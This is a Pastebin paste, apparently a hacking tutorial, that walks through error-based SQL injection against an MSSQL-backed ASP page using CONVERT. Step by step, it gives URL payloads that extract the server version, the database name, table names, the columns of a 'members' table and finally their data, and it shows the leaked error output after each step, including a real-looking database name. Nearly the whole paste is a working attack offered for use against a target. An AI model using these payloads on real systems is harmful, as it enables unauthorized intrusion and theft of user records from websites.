API tools faq
paste
Advertisement
Kyfx

MSSQL Injection Using Convert

Kyfx
Jul 25th, 2015
502
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.09 KB | None | 0 0
raw download clone embed print report
  1. we got A target and let's Check if it's Vulnerable for injecting.So we will Execute the URL by Adding Single Quote " ' "at the End If the Target Parameter.
  2. http://www.Vuln-Site.com/authorprofile.asp?id=46'
  3. It Gives us Error
  4.  
  5. ERROR:
  6. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  7. [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
  8. /authorprofile.asp, line 10
  9.  
  10. Our Target site is Vulnerable.As we Are Injecting with Convert Attack So we no need to Go For Counting the Total number Of Columns. We will Directly Execute our Commands with Convert.
  11. Let's Check The Version.
  12. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--
  13. After Executing the Query We Got The Version.
  14.  
  15. Here is Version:Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
  16. Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  17. [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
  18. /authorprofile.asp, line 10
  19.  
  20. Now Let's check The Current Database name.
  21. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--
  22. And we Have got The Current Database Name.
  23.  
  24. This is Current Database Name:museindia
  25. Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  26. [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
  27. /authorprofile.asp, line 10
  28.  
  29. As we have get the Version and The Database name. Now Let's move to Getting The Tables.
  30. This is Our Query for getting the Tables.
  31. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+
  32. After Executing the Query we have Got The First Table Name.
  33.  
  34. Table name:about
  35. Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  36. [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'about' to data type int.
  37. /authorprofile.asp, line 10
  38. For Getting the Other Tables from the Database we will add our Previous Table name Enclosed By Single Quotes with in Small Brackets.
  39. For Example:
  40. and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+
  41. So Let's Check The Other Tables from the Database.
  42. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+
  43. And We Have got The Next Table Name .
  44.  
  45. Next Table Name:aucon
  46. Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
  47. [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'aucon' to data type int.
  48. /authorprofile.asp, line 10
  49. In this Way we will Continue to Getting Other tables until get Required Table.
  50. Here we Got The Table name: members
  51. Now let's Get the Column names from this Table.
  52. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+
  53. we have got the First Column name.
  54.  
  55. This is the First Column Name:memberid
  56. Let's try to get the other Columns as we do the same for getting the other tables from the database.
  57.  
  58. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+
  59. So After Getting the Column name The Final Part is To Extracting Data from The Columns.
  60. This will be Our Final Query !
  61. http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 OUR_COLUMN_NAME _HERE from OUR_TABLE_NAME_HERE))--+
  62. This query will Print the Data from the Columns on the WebPage.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!